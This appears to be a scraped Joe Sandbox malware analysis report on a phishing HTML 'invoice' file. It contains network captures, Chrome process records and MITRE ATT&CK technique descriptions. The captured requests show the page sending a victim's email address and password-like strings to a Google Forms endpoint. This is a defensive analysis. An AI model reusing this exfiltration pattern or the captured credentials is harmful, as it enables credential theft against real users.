2024-12-20 12:46:38 UTC	1369	IN	Data Raw: 3a 22 23 66 65 66 32 66 32 22 2c 31 30 30 3a 22 23 66 65 65 32 65 32 22 2c 32 30 30 3a 22 23 66 65 63 61 63 61 22 2c 33 30 30 3a 22 23 66 63 61 35 61 35 22 2c 34 30 30 3a 22 23 66 38 37 31 37 31 22 2c 35 30 30 3a 22 23 65 66 34 34 34 34 22 2c 36 30 30 3a 22 23 64 63 32 36 32 36 22 2c 37 30 30 3a 22 23 62 39 31 63 31 63 22 2c 38 30 30 3a 22 23 39 39 31 62 31 62 22 2c 39 30 30 3a 22 23 37 66 31 64 31 64 22 2c 39 35 30 3a 22 23 34 35 30 61 30 61 22 7d 2c 6f 72 61 6e 67 65 3a 7b 35 30 3a 22 23 66 66 66 37 65 64 22 2c 31 30 30 3a 22 23 66 66 65 64 64 35 22 2c 32 30 30 3a 22 23 66 65 64 37 61 61 22 2c 33 30 30 3a 22 23 66 64 62 61 37 34 22 2c 34 30 30 3a 22 23 66 62 39 32 33 63 22 2c 35 30 30 3a 22 23 66 39 37 33 31 36 22 2c 36 30 30 3a 22 23 65 61 35 38 30 63 Data Ascii: :"#fef2f2",100:"#fee2e2",200:"#fecaca",300:"#fca5a5",400:"#f87171",500:"#ef4444",600:"#dc2626",700:"#b91c1c",800:"#991b1b",900:"#7f1d1d",950:"#450a0a"},orange:{50:"#fff7ed",100:"#ffedd5",200:"#fed7aa",300:"#fdba74",400:"#fb923c",500:"#f97316",600:"#ea580c
2024-12-20 12:46:38 UTC	1369	IN	Data Raw: 2c 36 30 30 3a 22 23 30 38 39 31 62 32 22 2c 37 30 30 3a 22 23 30 65 37 34 39 30 22 2c 38 30 30 3a 22 23 31 35 35 65 37 35 22 2c 39 30 30 3a 22 23 31 36 34 65 36 33 22 2c 39 35 30 3a 22 23 30 38 33 33 34 34 22 7d 2c 73 6b 79 3a 7b 35 30 3a 22 23 66 30 66 39 66 66 22 2c 31 30 30 3a 22 23 65 30 66 32 66 65 22 2c 32 30 30 3a 22 23 62 61 65 36 66 64 22 2c 33 30 30 3a 22 23 37 64 64 33 66 63 22 2c 34 30 30 3a 22 23 33 38 62 64 66 38 22 2c 35 30 30 3a 22 23 30 65 61 35 65 39 22 2c 36 30 30 3a 22 23 30 32 38 34 63 37 22 2c 37 30 30 3a 22 23 30 33 36 39 61 31 22 2c 38 30 30 3a 22 23 30 37 35 39 38 35 22 2c 39 30 30 3a 22 23 30 63 34 61 36 65 22 2c 39 35 30 3a 22 23 30 38 32 66 34 39 22 7d 2c 62 6c 75 65 3a 7b 35 30 3a 22 23 65 66 66 36 66 66 22 2c 31 30 30 3a 22 Data Ascii: ,600:"#0891b2",700:"#0e7490",800:"#155e75",900:"#164e63",950:"#083344"},sky:{50:"#f0f9ff",100:"#e0f2fe",200:"#bae6fd",300:"#7dd3fc",400:"#38bdf8",500:"#0ea5e9",600:"#0284c7",700:"#0369a1",800:"#075985",900:"#0c4a6e",950:"#082f49"},blue:{50:"#eff6ff",100:"
2024-12-20 12:46:38 UTC	1369	IN	Data Raw: 42 6c 75 65 28 29 7b 72 65 74 75 72 6e 20 71 72 28 7b 76 65 72 73 69 6f 6e 3a 22 76 32 2e 32 22 2c 66 72 6f 6d 3a 22 6c 69 67 68 74 42 6c 75 65 22 2c 74 6f 3a 22 73 6b 79 22 7d 29 2c 74 68 69 73 2e 73 6b 79 7d 2c 67 65 74 20 77 61 72 6d 47 72 61 79 28 29 7b 72 65 74 75 72 6e 20 71 72 28 7b 76 65 72 73 69 6f 6e 3a 22 76 33 2e 30 22 2c 66 72 6f 6d 3a 22 77 61 72 6d 47 72 61 79 22 2c 74 6f 3a 22 73 74 6f 6e 65 22 7d 29 2c 74 68 69 73 2e 73 74 6f 6e 65 7d 2c 67 65 74 20 74 72 75 65 47 72 61 79 28 29 7b 72 65 74 75 72 6e 20 71 72 28 7b 76 65 72 73 69 6f 6e 3a 22 76 33 2e 30 22 2c 66 72 6f 6d 3a 22 74 72 75 65 47 72 61 79 22 2c 74 6f 3a 22 6e 65 75 74 72 61 6c 22 7d 29 2c 74 68 69 73 2e 6e 65 75 74 72 61 6c 7d 2c 67 65 74 20 63 6f 6f 6c 47 72 61 79 28 29 7b 72 Data Ascii: Blue(){return qr({version:"v2.2",from:"lightBlue",to:"sky"}),this.sky},get warmGray(){return qr({version:"v3.0",from:"warmGray",to:"stone"}),this.stone},get trueGray(){return qr({version:"v3.0",from:"trueGray",to:"neutral"}),this.neutral},get coolGray(){r

Timestamp	Bytes transferred	Direction	Data
2024-12-20 12:46:49 UTC	777	OUT	POST /forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A/formResponse?usp=pp_url&entry.709402199=support_gestsup@fede39.admr.org&entry.1191394999=+kx3:d@JYacMd5, HTTP/1.1 Host: docs.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: null X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 12:46:51 UTC	3578	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Robots-Tag: noindex, nofollow, nosnippet Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 20 Dec 2024 12:46:50 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/docs-tt Content-Security-Policy: base-uri 'self';object-src 'none';report-uri https://csp.withgoogle.com/csp/forms/prod;script-src 'report-sample' 'nonce-qGh-zfZMk25ctZfgUir8LA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval' Reporting-Endpoints: default="/forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A/web-reports?bl=apps-forms.freebird_20241203.02_p0&context=eJwNyH1M1HUcB_Cv39_381UeTh4sXGo0CF3JJDhdIzUQjzuBGRAKX7ZwInFOTQGBQZr5tEpngUwF0UZ3PHpwnDOV-ciyDBObpZnP5dIE5TgkiJMHF9f7j9c_L-_T3m6mmGWSYg4fxYZ1itX7KxYcqFhHkGJzpiq2eaZi4XMU2xehWP48xXYtVqwabq9S7Al45Sr2CgxtUEzkKba1WLFyWL1ZsRK4s12xpxBdplgC3K1QrAfSKxUzw3i1YpMPKRZySbEocA4pNgYlbsW-gGPTM9kFWBKcyRQ8f7OXj0PMmgFuAsfFAd4G_Q8H-TB4Itx84ltu7oh08zZYv93Ni0Hb6eY-MPDRMB8FeneE6-AxuOCReYQ7YdueEb4LxjtHubwyyr8MHOP7Ibh2jM8Cb-bhgfB4hoe7IHOTh2dD-WYPr4KshglaLuSXca0UUqxcUzC7g2t6KNU0bRuE79C0uTBjl6aFQXmXplVBav98kQnpzgViBex3LxBfw72DC8Uj8HIsFAEwa26MiIDJ5hgRBEkUK9IguTNWZMDuhDhRAWVJcaISljfHiSzI74sTpbDcvlhkQUfrYnEVymIMohKaCwziW0gpMQgFr1YYxEyYfcwg9FB53CBqoKfNIAagfcAgOmAsJF7w0HiR-yxeFMOiAKNIhWchRjEOf4cbRS8UZxjFFmhdaxQnoWOjUVyFa-1GcQeedhvFP2AMNYlCmJ5tEq9DyMcmEQU39prEfTCmJIh0GLyZIDopUVwHnymJYgosnJgk4iHZO0lkQMoyCykoPmWhLfDSoIXCoMdkpQGw1FvpCKwYspIZ3h61Ugx846mlJmgMr6M2iGyoo2hQhfW0Et75o57iICeqgQpBv76B [TRUNCATED] Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: S=spreadsheet_forms=uTZIxSn2GSY_lOUfAxolKBjczrtuGRlJ4tg1h0GhKgo; Domain=.docs.google.com; Expires=Fri, 20-Dec-2024 13:46:50 GMT; Path=/forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A; Secure; HttpOnly; Priority=LOW; SameSite=none Set-Cookie: COMPASS=spreadsheet_forms=CjIACWuJV7i7kR22YB3ZtTr0526Q6xhesup1MsL6OHFd63eBY8q0S_GJgxjEe0TTY8UEgRDK6pW7BhpDAAlriVevEUEAba1tcKu9A6LGalcpn2OCTXKXexfigELY0u3gPXpqct24SuGymlGSyfAIIz3z-al542OM3WLLRg8_xw==; Domain=.docs.google.com; Expires=Fri, 20-Dec-2024 13:46:50 GMT; Path=/forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A; Secure; HttpOnly; Priority=LOW; SameSite=none Set-Cookie: NID=520=C9VzDoX5QZKlVDCyJ2Bqi_XS1b3fnFYDwlwq7B0F05ji9OmkXRPgfu0K4PiVp141pAYAhKAWxs_tXpt01R8wJohUt5d3SMU822sJd1j2_bsIrInFR7XfkA9gTyqSeFwu-KnHeDM1k4jhTYwZAJn78C7pElga2kIBCo-q5bxLAE9FCs3T5g3KNwbC; expires=Sat, 21-Jun-2025 12:46:50 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked

Timestamp	Bytes transferred	Direction	Data
2024-12-20 12:47:13 UTC	773	OUT	POST /forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A/formResponse?usp=pp_url&entry.709402199=support_gestsup@fede39.admr.org&entry.1191394999=pw!q@+,5Gv? HTTP/1.1 Host: docs.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: null X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 12:47:14 UTC	3536	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Robots-Tag: noindex, nofollow, nosnippet Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 20 Dec 2024 12:47:14 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/docs-tt Content-Security-Policy: base-uri 'self';object-src 'none';report-uri https://csp.withgoogle.com/csp/forms/prod;script-src 'report-sample' 'nonce-3Npl80_Oj3ey9JEolVJ02A' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval' Reporting-Endpoints: default="/forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A/web-reports?bl=apps-forms.freebird_20241203.02_p0&context=eJwNyH1M1HUcB_Cv39_381MeTh4sXOloELmSSXC4RmogHnchUzAUvmzhROOcmHJwMEgiRVfJSJRpB2ijO-TB4-GcicxMWZZharOZTFIplyQoxyFBnDy4uN5_vP55edu83Uwy6zzJHD6STWoka_CXLDhQsu4gyZYtlKzkNcnCl0l2NEIy03LJDq6RrBZ-3yrZY_DKluwlmNgtmciVbG-hZIdhe4lkRXC3TLInEFMpWSLcq5JsCNIskhlhtlay-cclC7kqWRQ4JySbgSK3ZJ_DmUUZ7DK8G5zBJDx7Y5jPQuyOMW4Ax5Ux3gmjD8f5JHgi3Hzum27uiHTzTthV5uaFoBxwcx8Y-3CSTwO9M8U18Ahc0G-c4k7YVzHFD8Ls9Wmu3pjmXwTO8GMQXD_Dl4A38_BAeLTYw12QscfDs-BwiYdXQ2bjHCUbTJVcKYYUG1ckLO3mihaKFUXZB-H7FSUaFh9UlDA4PKAo1bBhdIXIgDTnSrEZjrlXiq_gfs0q0Q9ejlUiAJZEx4oImG-MFUGQRHEiFZKvx4l0KE-MF1VQmRQvLLCpJV5kgmkkXhTDprY1IhO629eIm1AZqxMWyDHpRD605OnEN5BSpBMSlp7RCS1YzupEHQx16sQYdI3pRDfMhCQIHpogsp8miEJYHaAXG-BpiF7Mwt_hejEMhel6UQrtOXpxDrrz9eIm3OrSi7vwZFAv_gF9qEGYYVGWQbwKIR8ZRBT0HDGIPtCnJIo0GL-TKHporegDnwVrxQJYNTdJJECyd5JIh5SNVpJQeN5KpfDCuJXCYMhgozGwNtjoFGyesJER3pq2USx87amnZmgKP0mdENl4kmJAmhtoC7z9RwPFw7aoRjKDdlcj [TRUNCATED] Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: S=spreadsheet_forms=uTZIxSn2GSY_lOUfAxolKBjczrtuGRlJ4tg1h0GhKgo; Domain=.docs.google.com; Expires=Fri, 20-Dec-2024 13:47:14 GMT; Path=/forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A; Secure; HttpOnly; Priority=LOW; SameSite=none Set-Cookie: COMPASS=spreadsheet_forms=CjIACWuJV7i7kR22YB3ZtTr0526Q6xhesup1MsL6OHFd63eBY8q0S_GJgxjEe0TTY8UEgRDi6pW7Bho0AAlriVdV5154EzrsZgoautoY82dXUGaSyrzwgrsyAssqM3ZoxxbvWTDnwJxmk6_0VcpYUg==; Domain=.docs.google.com; Expires=Fri, 20-Dec-2024 13:47:14 GMT; Path=/forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A; Secure; HttpOnly; Priority=LOW; SameSite=none Set-Cookie: NID=520=TmlPUH2AKOYsOZ7LLfNVXYecgLwXiRZTi7M0_WyHPGDYQae0nuuEvr4k1LftFB6FbBcNGbWw-Xg4ECxrAyx15m9Sd-3Hv00IEDJ3S6mM7cV_2jvJrZ-Dm0oZhwy-rO17Oa8fYdno2mFlRezp-4feOBuzC80P92kHnIos-laT2UoCXxfOWZIyHZA; expires=Sat, 21-Jun-2025 12:47:14 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked

Timestamp	Bytes transferred	Direction	Data
2024-12-20 12:47:28 UTC	780	OUT	POST /forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A/formResponse?usp=pp_url&entry.709402199=support_gestsup@fede39.admr.org&entry.1191394999=9x;a%3C2E8]!F+z7ip HTTP/1.1 Host: docs.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: null X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 12:47:29 UTC	3543	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Robots-Tag: noindex, nofollow, nosnippet Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 20 Dec 2024 12:47:29 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/docs-tt Content-Security-Policy: base-uri 'self';object-src 'none';report-uri https://csp.withgoogle.com/csp/forms/prod;script-src 'report-sample' 'nonce-LypivWPd2rV5CyilcO4ikA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval' Reporting-Endpoints: default="/forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A/web-reports?bl=apps-forms.freebird_20241203.02_p0&context=eJwNyH1M1HUcB_Cv39_381MeTnkoXOlokLqSQXC4RmIgHnciMzAUvmzBQOJITTgEBmn4uApGnTqNB212hzx4AudMZGbGshwUNk0qTa1ckqDcHRLEyYOL6_3H65-Xt83bzSSzzJPM7iPZpEayJj_JggMk6wmSLHyhZLuWShYWLtmRCMlMKySrWiNZA_y2WbKH4JUv2XMwUSiZKJJsT5lkB6Fgl2TlcHufZI8gxixZEtw5LNkwpNdKZoTZBsnmH5MspFeyKHBMSDYD5W7JPoKzizLZZVgbnMkkFK7LZLvhyctOPgtxW8a4AexXxngXjN4f55PgiXDzua-4uT3Szbtg-z43LwPlgJv7wNi7k3wa6PUproEH4IIB4xR3wN6aKV4Fs33TXL06zT8OmOFHIbhxhi8Db-bhAfBgsYe7IHOnh-fCwV0eXgdZzXOUfDCZuVIBqVauSFjewxUtVCiKshfC9itKNCyuUpQlcHBQUepgw-hKkQnpjliRDUfdseIzuFu_SgyAl32V8Idl0XEiAuYb40QQJFO8SIOUvniRAdVJCeIwmJMTRC2YRhJEBWxqXyOyoKdjjbgG5jidqIUck068A6eLdeILSC3XCQnLz-qEFmrP6cQJGO7SiTHoHtOJHpgJSRQ8NFHkP04UZbDaXy82wOMQvZiFv8P0wgllGXpRCR1b9eI89OzQi2two1svbsOjIb34B_ShBlECi3IN4kUIec8goqDvkEH0gz41SaTD-M0k0UfrRD_4BK4TgbBqbrJIhBTvZJEBqRstJKHsgoUq4ZlxCy2BYYOVxsDSZKVTkD1hJSO8Om2lOPjc00it0BJ2krogsvkkxYAsaaIceO2PJkqAvKhmKgHt9mZa [TRUNCATED] Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: S=spreadsheet_forms=uTZIxSn2GSY_lOUfAxolKBjczrtuGRlJ4tg1h0GhKgo; Domain=.docs.google.com; Expires=Fri, 20-Dec-2024 13:47:29 GMT; Path=/forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A; Secure; HttpOnly; Priority=LOW; SameSite=none Set-Cookie: COMPASS=spreadsheet_forms=CjIACWuJV7i7kR22YB3ZtTr0526Q6xhesup1MsL6OHFd63eBY8q0S_GJgxjEe0TTY8UEgRDx6pW7Bho0AAlriVdV5154EzrsZgoautoY82dXUGaSyrzwgrsyAssqM3ZoxxbvWTDnwJxmk6_0VcpYUg==; Domain=.docs.google.com; Expires=Fri, 20-Dec-2024 13:47:29 GMT; Path=/forms/d/e/1FAIpQLSfv3AiWBEmIYrmJ8kN-HqBYeahK5zbe5BXp9djL9nezcIPI7A; Secure; HttpOnly; Priority=LOW; SameSite=none Set-Cookie: NID=520=UpABn-0_pjP7qNaSMJ_DHVcN_fs1Izx96SZVIPM2-PxecOHrWjL6Zw2hP4HXyXuU83jwTKqbH7D250Vsa0K6STCBBmQm77rHjOjY0CJLVJj5xPA0HbMpLZWTnU6BY7dvJt9BNx3iEEysaTjej4tvrPHSeqemnV3A1BoGR_ZQRdZjiS4gjAaLx-rk; expires=Sat, 21-Jun-2025 12:47:29 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-20 12:47:29 UTC	3543	IN	Data Raw: 36 39 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 48 42 31 65 43 64 2d 55 4d 72 6e 6d 62 20 50 48 4f 63 56 62 22 3e 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 64 6f 63 73 2f 73 70 72 65 61 64 73 68 65 65 74 73 2f 66 6f 72 6d 73 2f 66 61 76 69 63 6f 6e 5f 71 70 32 2e 70 6e 67 22 3e 3c 74 69 74 6c 65 3e 6e 65 77 20 6d 6f 76 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 5f 2f 66 72 65 65 Data Ascii: 69cf<!DOCTYPE html><html class="HB1eCd-UMrnmb PHOcVb"><head><link rel="shortcut icon" sizes="16x16" href="https://ssl.gstatic.com/docs/spreadsheets/forms/favicon_qp2.png"><title>new move</title><link rel="stylesheet" href="https://www.gstatic.com/_/free

Target ID:	0
Start time:	07:46:26
Start date:	20/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Invoice for 04-09-24 fede39.admr.org.html"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	2
Start time:	07:46:30
Start date:	20/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1680 --field-trial-handle=2028,i,1571332865371806087,6654669656635334013,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Invoice for 04-09-24 fede39.admr.org.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Boot Survival

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Chrome Cache Entry: 86

Chrome Cache Entry: 87

Chrome Cache Entry: 88

Chrome Cache Entry: 89

Chrome Cache Entry: 90

Chrome Cache Entry: 91

Chrome Cache Entry: 92

Chrome Cache Entry: 93

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
Invoice for 04-09-24 fede39.admr.org.html

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre